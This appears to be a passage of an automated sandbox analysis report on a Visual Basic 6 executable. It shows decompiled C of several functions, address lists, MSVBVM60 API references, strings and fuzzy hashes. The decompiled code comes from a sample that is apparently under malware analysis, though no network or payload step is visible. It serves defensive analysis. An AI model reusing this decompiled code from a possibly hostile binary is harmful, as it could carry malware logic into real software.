					}
					if( *0x425698 != 0) {
						_v196 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v196 = 0x425698;
					}
					_v160 =  *_v196;
					_v172 = _v56;
					_v56 = _v56 & 0x00000000;
					_v68 = _v172;
					_v76 = 8;
					_v120 = 0x37;
					_v128 = 2;
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t245 =  *((intOrPtr*)( *_v160 + 0x38))(_v160, 0x10, 0x10,  &_v92);
					asm("fclex");
					_v164 = _t245;
					_t291 = _v164;
					if(_t291 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x405080);
						_push(_v160);
						_push(_v164);
						L004017B8();
						_v200 = _t245;
					}
					_push( &_v92);
					_push( &_v112);
					L0040171C();
					_push( &_v112);
					_push( &_v52);
					L00401722();
					L0040178E();
					_push( &_v92);
					_push( &_v76);
					_push(2);
					L004017A0();
				}
				L0040163E();
				L004016EC();
				asm("fcomp qword [0x401480]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t291 != 0) {
					if( *0x425698 != 0) {
						_v204 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v204 = 0x425698;
					}
					_v152 =  *_v204;
					_t196 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v60);
					asm("fclex");
					_v156 = _t196;
					if(_v156 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v152);
						_push(_v156);
						L004017B8();
						_v208 = _t196;
					}
					_v160 = _v60;
					_t201 =  *((intOrPtr*)( *_v160 + 0x140))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t201;
					if(_v164 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050c0);
						_push(_v160);
						_push(_v164);
						L004017B8();
						_v212 = _t201;
					}
					_v40 = _v148;
					L0040178E();
					if( *0x425698 != 0) {
						_v216 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v216 = 0x425698;
					}
					_v152 =  *_v216;
					_t208 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v60);
					asm("fclex");
					_v156 = _t208;
					if(_v156 >= 0) {
						_v220 = _v220 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v152);
						_push(_v156);
						L004017B8();
						_v220 = _t208;
					}
					_v160 = _v60;
					_t213 =  *((intOrPtr*)( *_v160 + 0x108))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t213;
					if(_v164 >= 0) {
						_v224 = _v224 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x4050c0);
						_push(_v160);
						_push(_v164);
						L004017B8();
						_v224 = _t213;
					}
					_v48 = _v148;
					L0040178E();
					L004016C2();
				}
				_push(1);
				_push(1);
				_push(1);
				_push( &_v76);
				L00401638();
				_push( &_v76);
				L00401728();
				L00401752();
				L00401794();
				_v44 =  *0x401478;
				asm("wait");
				_push(0x42027b);
				L00401740();
				L00401740();
				L00401740();
				_t190 =  &_v52;
				_push(_t190);
				_push(0);
				L004016BC();
				return _t190;
			}

0x0041fc34
0x0041fc3f
0x0041fc40
0x0041fc4c
0x0041fc54
0x0041fc57
0x0041fc5e
0x0041fc65
0x0041fc6c
0x0041fc6e
0x0041fc70
0x0041fc72
0x0041fc77
0x0041fc78
0x0041fc82
0x0041fc8a
0x0041fc8f
0x0041fc96
0x0041fca0
0x0041fca4
0x0041fca5
0x0041fcaa
0x0041fcb4
0x0041fcc1
0x0041fcc2
0x0041fcc8
0x0041fcc9
0x0041fcce
0x0041fcd8
0x0041fcdc
0x0041fcdd
0x0041fcdf
0x0041fcf0
0x0041fcf6
0x0041fcfd
0x0041fd04
0x0041fd09
0x0041fd0a
0x0041fd14
0x0041fd1c
0x0041fd28
0x0041fd45
0x0041fd2a
0x0041fd2a
0x0041fd2f
0x0041fd34
0x0041fd39
0x0041fd39
0x0041fd57
0x0041fd6f
0x0041fd72
0x0041fd74
0x0041fd81
0x0041fda3
0x0041fd83
0x0041fd83
0x0041fd85
0x0041fd8a
0x0041fd90
0x0041fd96
0x0041fd9b
0x0041fd9b
0x0041fdad
0x0041fdc8
0x0041fdce
0x0041fdd0
0x0041fddd
0x0041fe02
0x0041fddf
0x0041fddf
0x0041fde4
0x0041fde9
0x0041fdef
0x0041fdf5
0x0041fdfa
0x0041fdfa
0x0041fe10
0x0041fe17
0x0041fe23
0x0041fe40
0x0041fe25
0x0041fe25
0x0041fe2a
0x0041fe2f
0x0041fe34
0x0041fe34
0x0041fe64
0x0041fe68
0x0041fe6d
0x0041fe85
0x0041fe8b
0x0041fe8d
0x0041fe9a
0x0041febf
0x0041fe9c
0x0041fe9c
0x0041fea1
0x0041fea6
0x0041feac
0x0041feb2
0x0041feb7
0x0041feb7
0x0041fecd
0x0041feea
0x0041fecf
0x0041fecf
0x0041fed4
0x0041fed9
0x0041fede
0x0041fede
0x0041fefc
0x0041ff05
0x0041ff0b
0x0041ff15
0x0041ff18
0x0041ff1f
0x0041ff26
0x0041ff34
0x0041ff3e
0x0041ff3f
0x0041ff40
0x0041ff41
0x0041ff45
0x0041ff4f
0x0041ff50
0x0041ff51
0x0041ff52
0x0041ff61
0x0041ff64
0x0041ff66
0x0041ff6c
0x0041ff73
0x0041ff95
0x0041ff75
0x0041ff75
0x0041ff77
0x0041ff7c
0x0041ff82
0x0041ff88
0x0041ff8d
0x0041ff8d
0x0041ff9f
0x0041ffa3
0x0041ffa4
0x0041ffac
0x0041ffb0
0x0041ffb1
0x0041ffb9
0x0041ffc1
0x0041ffc5
0x0041ffc6
0x0041ffc8
0x0041ffcd
0x0041ffd6
0x0041ffdb
0x0041ffe0
0x0041ffe6
0x0041ffe8
0x0041ffe9
0x0041fff6
0x00420013
0x0041fff8
0x0041fff8
0x0041fffd
0x00420002
0x00420007
0x00420007
0x00420025
0x0042003d
0x00420040
0x00420042
0x0042004f
0x00420071
0x00420051
0x00420051
0x00420053
0x00420058
0x0042005e
0x00420064
0x00420069
0x00420069
0x0042007b
0x00420096
0x0042009c
0x0042009e
0x004200ab
0x004200d0
0x004200ad
0x004200ad
0x004200b2
0x004200b7
0x004200bd
0x004200c3
0x004200c8
0x004200c8
0x004200de
0x004200e5
0x004200f1
0x0042010e
0x004200f3
0x004200f3
0x004200f8
0x004200fd
0x00420102
0x00420102
0x00420120
0x00420138
0x0042013b
0x0042013d
0x0042014a
0x0042016c
0x0042014c
0x0042014c
0x0042014e
0x00420153
0x00420159
0x0042015f
0x00420164
0x00420164
0x00420176
0x00420191
0x00420197
0x00420199
0x004201a6
0x004201cb
0x004201a8
0x004201a8
0x004201ad
0x004201b2
0x004201b8
0x004201be
0x004201c3
0x004201c3
0x004201d9
0x004201e0
0x004201e5
0x004201e5
0x004201ea
0x004201ec
0x004201ee
0x004201f3
0x004201f4
0x004201fc
0x004201fd
0x00420207
0x0042020f
0x0042021a
0x0042021d
0x0042021e
0x0042025a
0x00420262
0x0042026a
0x0042026f
0x00420272
0x00420273
0x00420275
0x0042027a

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 0041FC4C
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041FC78
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041FC82
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041FC8A
#652.MSVBVM60(?,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041FCA5
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,00000002,00000002,000000FF), ref: 0041FCC9
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FCDF
#705.MSVBVM60(00000002,00000000), ref: 0041FD0A
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041FD14
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041FD1C
__vbaNew2.MSVBVM60(00405090,00425698,00000002,00000000), ref: 0041FD34
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 0041FD96
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000140), ref: 0041FDF5
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000140), ref: 0041FE17
__vbaNew2.MSVBVM60(00404370,00425010), ref: 0041FE2F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FE68
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000140), ref: 0041FEB2
__vbaNew2.MSVBVM60(00405090,00425698), ref: 0041FED9
__vbaChkstk.MSVBVM60(?), ref: 0041FF34
__vbaChkstk.MSVBVM60(?), ref: 0041FF45
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000038), ref: 0041FF88
__vbaVar2Vec.MSVBVM60(?,?), ref: 0041FFA4
__vbaAryMove.MSVBVM60(?,?,?,?), ref: 0041FFB1
__vbaFreeObj.MSVBVM60(?,?,?,?), ref: 0041FFB9
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?), ref: 0041FFC8
__vbaFPInt.MSVBVM60 ref: 0041FFD6
__vbaFpR8.MSVBVM60 ref: 0041FFDB
__vbaNew2.MSVBVM60(00405090,00425698), ref: 00420002
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00420064
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000140), ref: 004200C3
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000140), ref: 004200E5
__vbaNew2.MSVBVM60(00405090,00425698), ref: 004200FD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 0042015F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000108), ref: 004201BE
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000108), ref: 004201E0
__vbaEnd.MSVBVM60(00000000,?,004050C0,00000108), ref: 004201E5
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 004201F4
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 004201FD
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 00420207
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042020F
__vbaFreeStr.MSVBVM60(0042027B,?,?,00000001,00000001,00000001), ref: 0042025A
__vbaFreeStr.MSVBVM60(0042027B,?,?,00000001,00000001,00000001), ref: 00420262
__vbaFreeStr.MSVBVM60(0042027B,?,?,00000001,00000001,00000001), ref: 0042026A
__vbaAryDestruct.MSVBVM60(00000000,?,0042027B,?,?,00000001,00000001,00000001), ref: 00420275

Strings

7, xrefs: 0041FF1F
Out of string space, xrefs: 0041FCAA

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$Chkstk$List$#539#652#703#705DestructVar2
String ID: 7$Out of string space
API String ID: 1714640597-777009397
Opcode ID: 8559291016ebdf3dede9b6b4c2dea46869c239f759ee76db5ad3bfbf492cac13
Instruction ID: 7b384ca63d42ea5ff75186ddc33e5fb81497956557d6f80854055e21b7982294
Opcode Fuzzy Hash: 8559291016ebdf3dede9b6b4c2dea46869c239f759ee76db5ad3bfbf492cac13
Instruction Fuzzy Hash: 8802E770A00228DFDB20DFA1DC45FDDB7B5AF05304F9041AAE109B72A2DB795A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420D00, Relevance: 66.4, APIs: 44, Instructions: 415
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00420D00(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				short _v36;
				short _v40;
				void* _v44;
				short _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				void* _v112;
				signed int _v116;
				signed int _v120;
				void* _v124;
				signed int _v128;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v208;
				intOrPtr* _v212;
				signed int _v216;
				signed int _t233;
				signed int _t238;
				short _t239;
				char* _t240;
				signed int _t242;
				char* _t251;
				signed int _t257;
				signed int _t262;
				signed int _t269;
				signed int _t274;
				signed int _t281;
				signed int _t288;
				signed int _t293;
				signed int _t300;
				signed int _t305;
				short _t306;
				signed int _t309;
				intOrPtr _t341;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t341;
				L00401530();
				_v12 = _t341;
				_v8 = 0x4014c8;
				if( *0x425698 != 0) {
					_v148 = 0x425698;
				} else {
					_push(0x425698);
					_push(0x405090);
					L004017BE();
					_v148 = 0x425698;
				}
				_v116 =  *_v148;
				_t233 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
				asm("fclex");
				_v120 = _t233;
				if(_v120 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x405080);
					_push(_v116);
					_push(_v120);
					L004017B8();
					_v152 = _t233;
				}
				_v124 = _v60;
				_t238 =  *((intOrPtr*)( *_v124 + 0xb8))(_v124,  &_v112);
				asm("fclex");
				_v128 = _t238;
				if(_v128 >= 0) {
					_v156 = _v156 & 0x00000000;
				} else {
					_push(0xb8);
					_push(0x4050c0);
					_push(_v124);
					_push(_v128);
					L004017B8();
					_v156 = _t238;
				}
				_t239 = _v112;
				_v48 = _t239;
				L0040178E();
				L0040161A();
				_v68 = _t239;
				_v76 = 8;
				_t240 =  &_v76;
				_push(_t240);
				L00401620();
				_v116 =  ~(0 | _t240 != 0x0000ffff);
				L00401794();
				if(_v116 != 0) {
					if( *0x425698 != 0) {
						_v160 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v160 = 0x425698;
					}
					_v116 =  *_v160;
					_t288 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
					asm("fclex");
					_v120 = _t288;
					if(_v120 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v164 = _t288;
					}
					_v124 = _v60;
					_t293 =  *((intOrPtr*)( *_v124 + 0xd0))(_v124,  &_v56);
					asm("fclex");
					_v128 = _t293;
					if(_v128 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x4050c0);
						_push(_v124);
						_push(_v128);
						L004017B8();
						_v168 = _t293;
					}
					_v136 = _v56;
					_v56 = _v56 & 0x00000000;
					L00401752();
					L0040178E();
					if( *0x425698 != 0) {
						_v172 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v172 = 0x425698;
					}
					_v116 =  *_v172;
					_t300 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
					asm("fclex");
					_v120 = _t300;
					if(_v120 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v176 = _t300;
					}
					_v124 = _v60;
					_t305 =  *((intOrPtr*)( *_v124 + 0x70))(_v124,  &_v112);
					asm("fclex");
					_v128 = _t305;
					if(_v128 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4050c0);
						_push(_v124);
						_push(_v128);
						L004017B8();
						_v180 = _t305;
					}
					_t306 = _v112;
					_v40 = _t306;
					L0040178E();
					L004016B0();
					_t309 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t306);
					asm("fclex");
					_v116 = _t309;
					if(_v116 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x404b0c);
						_push(_a4);
						_push(_v116);
						L004017B8();
						_v184 = _t309;
					}
				}
				_v68 = 9;
				_v76 = 2;
				_t242 =  &_v76;
				_push(_t242);
				L00401614();
				L00401752();
				_push(_t242);
				_push(0x406290);
				L00401716();
				asm("sbb eax, eax");
				_v116 =  ~( ~( ~_t242));
				L00401740();
				L00401794();
				if(_v116 != 0) {
					if( *0x425698 != 0) {
						_v188 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v188 = 0x425698;
					}
					_v116 =  *_v188;
					_t257 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
					asm("fclex");
					_v120 = _t257;
					if(_v120 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v192 = _t257;
					}
					_v124 = _v60;
					_t262 =  *((intOrPtr*)( *_v124 + 0x140))(_v124,  &_v112);
					asm("fclex");
					_v128 = _t262;
					if(_v128 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050c0);
						_push(_v124);
						_push(_v128);
						L004017B8();
						_v196 = _t262;
					}
					_v36 = _v112;
					L0040178E();
					if( *0x425698 != 0) {
						_v200 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v200 = 0x425698;
					}
					_v116 =  *_v200;
					_t269 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
					asm("fclex");
					_v120 = _t269;
					if(_v120 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v204 = _t269;
					}
					_v124 = _v60;
					_t274 =  *((intOrPtr*)( *_v124 + 0x130))(_v124,  &_v56);
					asm("fclex");
					_v128 = _t274;
					if(_v128 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x4050c0);
						_push(_v124);
						_push(_v128);
						L004017B8();
						_v208 = _t274;
					}
					_v140 = _v56;
					_v56 = _v56 & 0x00000000;
					L00401752();
					L0040178E();
					if( *0x425698 != 0) {
						_v212 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v212 = 0x425698;
					}
					_v116 =  *_v212;
					_t281 =  *((intOrPtr*)( *_v116 + 0x48))(_v116, 0xe1,  &_v56);
					asm("fclex");
					_v120 = _t281;
					if(_v120 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405080);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v216 = _t281;
					}
					_v144 = _v56;
					_v56 = _v56 & 0x00000000;
					L00401752();
				}
				_v68 = 2;
				_v76 = 2;
				_push( &_v76);
				_push( &_v92);
				L0040160E();
				_push( &_v92);
				L00401728();
				L00401752();
				_push( &_v92);
				_t251 =  &_v76;
				_push(_t251);
				_push(2);
				L004017A0();
				_v24 = 0xc5232;
				asm("wait");
				_push(0x42133f);
				L00401740();
				L00401740();
				L00401740();
				L00401740();
				return _t251;
			}

0x00420d05
0x00420d10
0x00420d11
0x00420d1d
0x00420d25
0x00420d28
0x00420d36
0x00420d53
0x00420d38
0x00420d38
0x00420d3d
0x00420d42
0x00420d47
0x00420d47
0x00420d65
0x00420d74
0x00420d77
0x00420d79
0x00420d80
0x00420d9c
0x00420d82
0x00420d82
0x00420d84
0x00420d89
0x00420d8c
0x00420d8f
0x00420d94
0x00420d94
0x00420da6
0x00420db5
0x00420dbb
0x00420dbd
0x00420dc4
0x00420de3
0x00420dc6
0x00420dc6
0x00420dcb
0x00420dd0
0x00420dd3
0x00420dd6
0x00420ddb
0x00420ddb
0x00420dea
0x00420dee
0x00420df5
0x00420dfa
0x00420dff
0x00420e02
0x00420e09
0x00420e0c
0x00420e0d
0x00420e1d
0x00420e24
0x00420e2f
0x00420e3c
0x00420e59
0x00420e3e
0x00420e3e
0x00420e43
0x00420e48
0x00420e4d
0x00420e4d
0x00420e6b
0x00420e7a
0x00420e7d
0x00420e7f
0x00420e86
0x00420ea2
0x00420e88
0x00420e88
0x00420e8a
0x00420e8f
0x00420e92
0x00420e95
0x00420e9a
0x00420e9a
0x00420eac
0x00420ebb
0x00420ec1
0x00420ec3
0x00420eca
0x00420ee9
0x00420ecc
0x00420ecc
0x00420ed1
0x00420ed6
0x00420ed9
0x00420edc
0x00420ee1
0x00420ee1
0x00420ef3
0x00420ef9
0x00420f06
0x00420f0e
0x00420f1a
0x00420f37
0x00420f1c
0x00420f1c
0x00420f21
0x00420f26
0x00420f2b
0x00420f2b
0x00420f49
0x00420f58
0x00420f5b
0x00420f5d
0x00420f64
0x00420f80
0x00420f66
0x00420f66
0x00420f68
0x00420f6d
0x00420f70
0x00420f73
0x00420f78
0x00420f78
0x00420f8a
0x00420f99
0x00420f9c
0x00420f9e
0x00420fa5
0x00420fc1
0x00420fa7
0x00420fa7
0x00420fa9
0x00420fae
0x00420fb1
0x00420fb4
0x00420fb9
0x00420fb9
0x00420fc8
0x00420fcc
0x00420fd3
0x00420fde
0x00420fec
0x00420fef
0x00420ff1
0x00420ff8
0x00421014
0x00420ffa
0x00420ffa
0x00420ffc
0x00421001
0x00421004
0x00421007
0x0042100c
0x0042100c
0x00420ff8
0x0042101b
0x00421022
0x00421029
0x0042102c
0x0042102d
0x00421037
0x0042103c
0x0042103d
0x00421042
0x00421049
0x0042104f
0x00421056
0x0042105e
0x00421069
0x00421076
0x00421093
0x00421078
0x00421078
0x0042107d
0x00421082
0x00421087
0x00421087
0x004210a5
0x004210b4
0x004210b7
0x004210b9
0x004210c0
0x004210dc
0x004210c2
0x004210c2
0x004210c4
0x004210c9
0x004210cc
0x004210cf
0x004210d4
0x004210d4
0x004210e6
0x004210f5
0x004210fb
0x004210fd
0x00421104
0x00421123
0x00421106
0x00421106
0x0042110b
0x00421110
0x00421113
0x00421116
0x0042111b
0x0042111b
0x0042112e
0x00421135
0x00421141
0x0042115e
0x00421143
0x00421143
0x00421148
0x0042114d
0x00421152
0x00421152
0x00421170
0x0042117f
0x00421182
0x00421184
0x0042118b
0x004211a7
0x0042118d
0x0042118d
0x0042118f
0x00421194
0x00421197
0x0042119a
0x0042119f
0x0042119f
0x004211b1
0x004211c0
0x004211c6
0x004211c8
0x004211cf
0x004211ee
0x004211d1
0x004211d1
0x004211d6
0x004211db
0x004211de
0x004211e1
0x004211e6
0x004211e6
0x004211f8
0x004211fe
0x0042120b
0x00421213
0x0042121f
0x0042123c
0x00421221
0x00421221
0x00421226
0x0042122b
0x00421230
0x00421230
0x0042124e
0x00421262
0x00421265
0x00421267
0x0042126e
0x0042128a
0x00421270
0x00421270
0x00421272
0x00421277
0x0042127a
0x0042127d
0x00421282
0x00421282
0x00421294
0x0042129a
0x004212a7
0x004212a7
0x004212ac
0x004212b3
0x004212bd
0x004212c1
0x004212c2
0x004212ca
0x004212cb
0x004212d5
0x004212dd
0x004212de
0x004212e1
0x004212e2
0x004212e4
0x004212ec
0x004212f3
0x004212f4
0x00421321
0x00421329
0x00421331
0x00421339
0x0042133e

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00420D1D
__vbaNew2.MSVBVM60(00405090,00425698,?,?,?,?,00401536), ref: 00420D42
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00420D8F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,000000B8), ref: 00420DD6
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,000000B8), ref: 00420DF5
#609.MSVBVM60(00000000,?,004050C0,000000B8), ref: 00420DFA
#557.MSVBVM60(00000008), ref: 00420E0D
__vbaFreeVar.MSVBVM60(00000008), ref: 00420E24
__vbaNew2.MSVBVM60(00405090,00425698,00000008), ref: 00420E48
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00420E95
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,000000D0), ref: 00420EDC
__vbaStrMove.MSVBVM60(00000000,?,004050C0,000000D0), ref: 00420F06
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,000000D0), ref: 00420F0E
__vbaNew2.MSVBVM60(00405090,00425698), ref: 00420F26
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00420F73
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000070), ref: 00420FB4
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000070), ref: 00420FD3
__vbaFpI4.MSVBVM60(00000000,?,004050C0,00000070), ref: 00420FDE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404B0C,00000064), ref: 00421007
#574.MSVBVM60(00000002,00000008), ref: 0042102D
__vbaStrMove.MSVBVM60(00000002,00000008), ref: 00421037
__vbaStrCmp.MSVBVM60(00406290,00000000,00000002,00000008), ref: 00421042
__vbaFreeStr.MSVBVM60(00406290,00000000,00000002,00000008), ref: 00421056
__vbaFreeVar.MSVBVM60(00406290,00000000,00000002,00000008), ref: 0042105E
__vbaNew2.MSVBVM60(00405090,00425698,00406290,00000000,00000002,00000008), ref: 00421082
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014,?,?,?,?,00406290,00000000,00000002,00000008), ref: 004210CF
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000140,?,?,?,?,00406290,00000000,00000002,00000008), ref: 00421116
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00406290,00000000,00000002,00000008), ref: 00421135
__vbaNew2.MSVBVM60(00405090,00425698,?,?,?,?,?,?,00406290,00000000,00000002,00000008), ref: 0042114D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014,?,?,?,?,?,?,00406290,00000000,00000002,00000008), ref: 0042119A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000130,?,?,?,?,?,?,?,?,00406290,00000000,00000002,00000008), ref: 004211E1
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00406290,00000000,00000002,00000008), ref: 0042120B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00406290,00000000,00000002,00000008), ref: 00421213
__vbaNew2.MSVBVM60(00405090,00425698,?,?,?,?,?,?,?,?,00406290,00000000,00000002,00000008), ref: 0042122B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000048,?,?,?,?,?,?,?,?,?,?,00406290,00000000), ref: 0042127D
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00406290,00000000,00000002,00000008), ref: 004212A7
#613.MSVBVM60(?,00000002,00406290,00000000,00000002,00000008), ref: 004212C2
__vbaStrVarMove.MSVBVM60(?,?,00000002,00406290,00000000,00000002,00000008), ref: 004212CB
__vbaStrMove.MSVBVM60(?,?,00000002,00406290,00000000,00000002,00000008), ref: 004212D5
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,00406290,00000000,00000002,00000008), ref: 004212E4
__vbaFreeStr.MSVBVM60(0042133F), ref: 00421321
__vbaFreeStr.MSVBVM60(0042133F), ref: 00421329
__vbaFreeStr.MSVBVM60(0042133F), ref: 00421331
__vbaFreeStr.MSVBVM60(0042133F), ref: 00421339

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#557#574#609#613ChkstkList
String ID:
API String ID: 628647532-0
Opcode ID: c048726719c852ba1e77e3836679ac50d97f063b6f8a23d5392b9f575572607f
Instruction ID: 8e94ccf1a4223b437c06e4354ae71ddb211c20088ccd743e77b2301d6b9d57d6
Opcode Fuzzy Hash: c048726719c852ba1e77e3836679ac50d97f063b6f8a23d5392b9f575572607f
Instruction Fuzzy Hash: 59120674E01628EFDB20DFA1D845BDDBBB4BF08304FA0416AE105B72A2DB785985CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00418DDF, Relevance: 52.8, APIs: 35, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00418DDF(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v96;
				char _v116;
				intOrPtr* _v120;
				signed int _v124;
				void* _v128;
				signed int _v132;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr* _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				char* _t147;
				signed int _t151;
